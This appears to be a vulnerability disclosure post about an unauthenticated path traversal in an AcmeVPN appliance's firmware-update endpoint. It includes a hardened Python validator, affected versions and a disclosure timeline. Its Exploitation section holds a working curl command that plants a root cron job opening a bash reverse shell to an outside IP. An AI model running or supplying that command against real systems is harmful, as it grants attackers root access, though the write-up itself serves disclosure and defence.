During a routine assessment of an AcmeVPN appliance we found an unauthenticated path traversal in the firmware update endpoint that we chained into full root code execution. This post walks through discovery, exploitation, and the fix.
⚠️ Warning: this technique will write to the appliance filesystem. Only run it against systems you are authorized to test.
## Discovery

The update endpoint accepts a `file` parameter that is concatenated into a filesystem path without normalization, so `..` segments in the value walk out of the intended upload directory:

```http
POST /api/v1/update HTTP/1.1
Host: vpn.target.local
Content-Type: application/json

{"file": "../../../../etc/cron.d/payload"}
```
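To make the root cause concrete, here is the flawed path construction next to a hardened version that rejects the request body shown above. This is an added example written for this post, not the appliance's own code; `UPDATE_DIR` and the function names are assumptions.

```python
import os
import posixpath

# Hypothetical staging directory for uploaded firmware (assumption; the
# real AcmeVPN path is not given in the post).
UPDATE_DIR = "/var/lib/acmevpn/updates"

class PathTraversalError(ValueError):
    """Raised when a client-supplied filename would escape UPDATE_DIR."""

def vulnerable_update_path(filename: str) -> str:
    """The flawed pattern from the post: raw concatenation, no normalization."""
    return UPDATE_DIR + "/" + filename

def lands_at(filename: str) -> str:
    """Where the kernel would actually write the concatenated path."""
    return posixpath.normpath(vulnerable_update_path(filename))

def safe_update_path(filename: str, base: str = UPDATE_DIR) -> str:
    """Return an absolute path inside `base`, or raise PathTraversalError."""
    # (1) Allow-list the syntax: exactly one path component, no '.'/'..',
    #     no NUL byte (which truncates the path in C-level syscalls).
    if (not filename or filename in (".", "..")
            or any(c in filename for c in "/\\\x00")):
        raise PathTraversalError(f"rejected filename: {filename!r}")
    # (2) Defense in depth: resolve both sides (follows symlinks) and
    #     require the candidate to remain under the staging directory.
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, filename))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PathTraversalError(f"escapes update dir: {candidate}")
    return candidate

def is_contained(filename: str, base: str = UPDATE_DIR) -> bool:
    """True if `filename` would be accepted by safe_update_path."""
    try:
        safe_update_path(filename, base)
    except PathTraversalError:
        return False
    return True

if __name__ == "__main__":
    evil = "../../../../etc/cron.d/payload"  # body from the request above
    print(lands_at(evil))                     # /etc/cron.d/payload
    print(is_contained(evil), is_contained("firmware-4.4.bin"))  # False True
```

The first check alone would be enough for the bug described here; the second catches a symlink planted inside the staging directory, which a plain string check does not see.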
## Exploitation

By traversing out of the intended directory we can drop a cron job that executes our payload as root:

```bash
curl -sk https://vpn.target.local/api/v1/update \
-H 'Content-Type: application/json' \
-d '{"file":"../../../../etc/cron.d/x","data":"* * * * * root /bin/bash -i >& /dev/tcp/10.10.14.7/443 0>&1"}'
```
✅ Tip: catch the reverse shell with a simple listener before sending the request.
## Affected versions

| Version | Status |
|---|---|
| 4.0 – 4.3 | Vulnerable |
| 4.4+ | Patched |
## Disclosure timeline

Reported to the vendor on day 0, triaged within a week, patched in 4.4, and publicly disclosed after the 90-day window.
🛑 Danger: unpatched appliances remain exploitable from the network with no credentials.